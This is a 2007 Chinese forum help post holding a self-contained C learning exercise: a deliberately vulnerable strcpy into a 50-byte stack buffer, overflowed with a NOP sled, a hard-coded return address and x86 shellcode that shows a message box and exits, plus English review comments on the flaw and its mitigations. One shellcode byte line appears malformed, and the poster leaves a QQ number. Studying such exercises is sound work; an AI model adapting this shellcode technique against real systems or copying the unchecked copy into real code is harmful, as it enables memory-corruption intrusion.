[求助]学习shellcode遇到一个问题,高手帮忙啊~!
发表于:
2007-3-15 11:13
#include <string.h>
#include <stdio.h>
#include <windows.h>
/*
 * Four bytes that main() writes at offset 56 of the oversized input, i.e. the
 * bytes meant to land on MyCopy()'s saved return address. Read as a
 * little-endian 32-bit value they are 0x77D85928, a fixed absolute address.
 * NOTE(review): the macro name suggests the address holds a "jmp esp"
 * instruction inside a system DLL on the poster's machine - not verifiable
 * from this listing.
 * A hard-coded address like this is only meaningful on one exact OS/DLL build;
 * address-space layout randomisation (ASLR) moves module bases and makes it
 * point at unrelated memory.
 */
#define JUMPESP "\x28\x59\xD8\x77"
/* 8-byte array: the 4 bytes above followed by zero fill, so the strcpy() in
 * main() copies exactly those 4 bytes plus a terminating NUL. */
unsigned char eip[8] = JUMPESP;
unsigned char sploit[] =
{
"\x60"
"\x8B\xEC"
"\x83\xEC\x54"
"\x33\xC9"
"\xC6\x45\xDB\x75"
"\xC6\x45\xDC\x73"
"\xC6\x45\xDD\x65"
"\xC6\x45\xDE\x72"
"\xC6\x45\xDF\x33"
"\xC6\x45\xE0\x32"
"\xC6\x45\xE7\x2E"
"\xC6\x45\xE\x64"
"\xC6\x45\xE9\x6C"
"\xC6\x45\xEA\x6C"
"\x88\x4D\xEB"
"\x8D\x45\xDB"
"\x50"
"\xB8\x77\x1D\x80\x7C"
"\xFF\xD0"
"\x55"
"\x51"
"\x8B\xEC"
"\x83\xEC\x54"
"\x33\xC9"
"\xC6\x45\xEC\x53"
"\xC6\x45\xED\x75"
"\xC6\x45\xEE\x63"
"\xC6\x45\xEF\x63"
"\xC6\x45\xF0\x65"
"\xC6\x45\xF1\x73"
"\xC6\x45\xF2\x73"
"\x88\x4D\xF3"
"\xC6\x45\xF4\x57"
"\xC6\x45\xF5\x65"
"\xC6\x45\xF6\x20"
"\xC6\x45\xF7\x47"
"\xC6\x45\xF8\x6F"
"\xC6\x45\xF9\x74"
"\xC6\x45\xFA\x20"
"\xC6\x45\xFB\x49"
"\xC6\x45\xFC\x74"
"\xC6\x45\xFD\x21"
"\x88\x4D\xFE"
"\x51"
"\x8D\x45\xEC"
"\x50"
"\x8D\x45\xF4"
"\x50"
"\x51"
"\xB8\xEA\x04\xD5\x77"
"\xFF\xD0"
"\x33\xDB"
"\x53"
"\xB8\xA2\xCA\x81\x7C"
"\xFF\xD0"
"\x8B\xE5"
"\x61"
};
/*
 * Deliberately vulnerable copy routine: the overflow target of this exercise.
 *
 * str: NUL-terminated input; its length is never checked.
 * Returns 1 unconditionally.
 *
 * This is a classic stack-based buffer overflow (CWE-121). Any input of 50 or
 * more characters writes past buff1 into adjacent stack data, which on 32-bit
 * x86 includes the saved frame pointer and the saved return address.
 */
int MyCopy( char* str )
{
/* Fixed 50-byte stack buffer; nothing ties the copy length to this size. */
char buff1[50];
/* strcpy() copies until the source NUL regardless of destination capacity.
 * Production code would bound the write, e.g.
 * snprintf(buff1, sizeof buff1, "%s", str), and reject over-long input.
 * Building with stack cookies (/GS, -fstack-protector) detects the overwrite
 * before the function returns. */
strcpy(buff1,str);
return 1;
}
/*
 * Driver for the exercise: builds an over-long string in Buff and passes it to
 * MyCopy(), whose 50-byte buffer cannot hold it. Everything runs inside this
 * one process; no external input is involved.
 *
 * Layout of Buff: 56 filler bytes of 0x90, the 4 bytes of eip at offset 56,
 * then the bytes of sploit from offset 60, all NUL-terminated by strcpy().
 * NOTE(review): the value 56 assumes a particular compiler and stack layout
 * for MyCopy() - it is not derived from anything in this file.
 */
int main()
{
HINSTANCE u32=NULL;
/* Load user32.dll into this process up front. */
u32=LoadLibrary("user32.dll");
if(u32==NULL)
{
/* Failure is only reported; execution continues regardless. */
printf("cann't load user32.dll");
}
char Buff[1024];
/* Zero the whole buffer so the assembled string is NUL-terminated. */
memset(&Buff,0,sizeof(Buff));
/* Empty loop body: the store happens in the increment expression and fills
 * Buff[0..55] with 0x90 (the x86 NOP opcode). */
for(int i=0;i<56;Buff[i++]=0x90);
strcpy(Buff+56,(char *)eip);// copies the 4 non-zero bytes of eip plus a NUL
strcpy(Buff+60,(char *)sploit);// overwrites that NUL; copies sploit up to its first 0x00
/* The copy inside MyCopy() runs well past its 50-byte buffer. */
MyCopy(Buff);
/* Reached only if MyCopy() returns to this call site. */
printf("\n successed \n");
return 0;
}
//一个简单的缓冲区溢出
当溢出成功后,如何返回到main函数中继续后面的执行呢?
留个qq:406670611